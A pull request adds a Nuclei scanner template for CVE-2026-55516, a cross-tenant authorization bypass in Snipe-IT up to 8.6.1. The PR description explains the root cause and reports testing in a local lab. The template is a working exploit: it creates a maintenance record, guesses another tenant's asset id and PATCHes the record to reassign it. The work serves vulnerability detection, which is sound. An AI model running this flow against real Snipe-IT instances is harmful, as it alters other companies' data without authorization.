### PR TITLE
Add CVE-2026-55516 (Snipe-IT cross-tenant maintenance authorization bypass)

### DIFF
--- a/http/cves/2026/CVE-2026-55516.yaml
+++ b/http/cves/2026/CVE-2026-55516.yaml
@@ -1,0 +1,132 @@
+id: CVE-2026-55516
+
+info:
+  name: Snipe-IT <=8.6.1 - Cross-Tenant Maintenance Authorization Bypass
+  author: builtbybrayden,5h1kh4r
+  severity: high
+  description: |
+    Snipe-IT through 8.6.1 fails to re-validate the company/tenant scope of a
+    user-supplied asset_id when a caller updates an existing asset maintenance
+    record via PATCH/PUT /api/v1/maintenances/{id}. The endpoint scopes the
+    caller against the maintenance record's *original* asset at create time,
+    but never re-checks scope against the *new* asset_id supplied on update.
+    A low-privileged, company-scoped user can therefore create a maintenance
+    record against an asset they legitimately own, then PATCH its asset_id to
+    reference an asset belonging to a different company/tenant, achieving a
+    cross-tenant authorization bypass on multi-company (FMCS) installs. Fixed
+    in 8.6.2.
+  impact: |
+    An authenticated, low-privileged user scoped to a single company can read
+    and modify asset maintenance data belonging to other tenants on the same
+    Snipe-IT instance, breaking the tenant-isolation guarantee that multi-
+    company deployments rely on.
+  remediation: |
+    Upgrade to Snipe-IT 8.6.2 or later, which re-validates company scope on
+    the updated asset_id.
+  reference:
+    - https://github.com/grokability/snipe-it/security/advisories/GHSA-575r-357h-fhch
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-55516
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N
+    cvss-score: 7.7
+    cve-id: CVE-2026-55516
+    cwe-id: CWE-639
+    cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: snipeitapp
+    product: snipe-it
+    shodan-query: http.title:"Snipe-IT"
+    fofa-query: app="Snipe-IT"
+  tags: cve,cve2026,snipeit,authz,idor
+
+flow: |
+  http(1);
+  let ids = template["OwnAssets"];
+  if (ids && ids.length > 0) {
+    set("OwnAssetForCreate", ids[0]);
+    http(2);
+    http(3);
+    if (template["MaintenanceID"]) {
+      let maxId = 0;
+      for (let i = 0; i < ids.length; i++) {
+        if (ids[i] > maxId) { maxId = ids[i]; }
+      }
+      let target = -1;
+      for (let i = 1; i <= maxId + 5; i++) {
+        if (ids.indexOf(i) === -1) { target = i; break; }
+      }
+      if (target > 0) {
+        set("ForeignID", target);
+        http(4);
+      } else {
+        log("No out-of-scope asset id candidate found in range.");
+      }
+    } else {
+      log("Could not resolve the created maintenance record's id.");
+    }
+  } else {
+    log("Token has no visible assets; cannot create a seed maintenance record.");
+  }
+
+http:
+  - id: 1
+    raw:
+      - |
+        GET /api/v1/hardware HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Accept: application/json
+    extractors:
+      - type: json
+        name: OwnAssets
+        internal: true
+        json:
+          - ".rows[].id"
+
+  - id: 2
+    raw:
+      - |
+        POST /api/v1/maintenances HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Accept: application/json
+        Content-Type: application/json
+
+        {"asset_id":{{OwnAssetForCreate}},"supplier_id":1,"maintenance_type_id":1,"name":"nuclei-{{randstr}}","title":"nuclei-{{randstr}}","start_date":"2026-01-01","is_warranty":false}
+
+  - id: 3
+    raw:
+      - |
+        GET /api/v1/maintenances?sort=id&order=desc&limit=1 HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Accept: application/json
+    extractors:
+      - type: json
+        name: MaintenanceID
+        internal: true
+        json:
+          - ".rows[0].id"
+
+  - id: 4
+    raw:
+      - |
+        PATCH /api/v1/maintenances/{{MaintenanceID}} HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Accept: application/json
+        Content-Type: application/json
+
+        {"asset_id":{{ForeignID}}}
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"status":"success"'
+      - type: word
+        part: body
+        words:
+          - '"asset_id":{{ForeignID}}'


### PR DESCRIPTION
## Summary

New template `http/cves/2026/CVE-2026-55516.yaml` for **CVE-2026-55516** / [GHSA-575r-357h-fhch](https://github.com/grokability/snipe-it/security/advisories/GHSA-575r-357h-fhch), a high-severity (CVSS 7.7) cross-tenant authorization bypass in Snipe-IT <=8.6.1, fixed in 8.6.2.

**Root cause:** `PATCH`/`PUT /api/v1/maintenances/{id}` authorizes the caller against the maintenance record's *original* asset (`MaintenancePolicy::update()` → `Gate::allows('update', $maintenance->asset)`), then writes an attacker-supplied `asset_id` without re-checking company/tenant scope on the *new* value.

**Template design:** a complete, self-contained flow PoC (not version-only detection), requiring only a single low-privileged, company-scoped API token (`{{token}}`) — no admin credentials needed, matching real-world exploitability. Using that one token, it:
1. Lists the caller's own visible assets (`GET /api/v1/hardware`)
2. Creates a legitimate maintenance record against one of them (`POST /api/v1/maintenances`)
3. Resolves the new record's id
4. Picks the smallest asset id *not* in the caller's own visible list (a simple ID-gap guess, since Snipe-IT's asset ids auto-increment across the whole instance regardless of company) and `PATCH`es the record's `asset_id` to it
5. Matches on `"status":"success"` + the attacker-chosen `asset_id` being echoed back, confirming the server accepted and persisted the cross-tenant reassignment

## Verification

- `nuclei -t CVE-2026-55516.yaml -validate` passes.
- Verified end-to-end against a local, disposable two-tenant Snipe-IT v8.6.1 Docker lab (two companies, one company-scoped low-privileged user, one asset per company): the template fires with a match, and the cross-tenant write was independently confirmed via a separate admin-token `GET` showing the maintenance record's `asset_id`/`company` had actually moved to the other tenant in the database.
- No real target, credentials, or IPs appear anywhere in the template or this PR — all testing used an ephemeral local lab built from the official `snipe/snipe-it:v8.6.1` image with synthetic data.
- Happy to share the docker-compose repro lab directly for review/validation — just let me know the best channel.

## Credit

`author` credits both reporters listed on the GHSA advisory: myself (@builtbybrayden) and @5h1kh4r.

🤖 Generated with [Claude Code](https://claude.com/claude-code)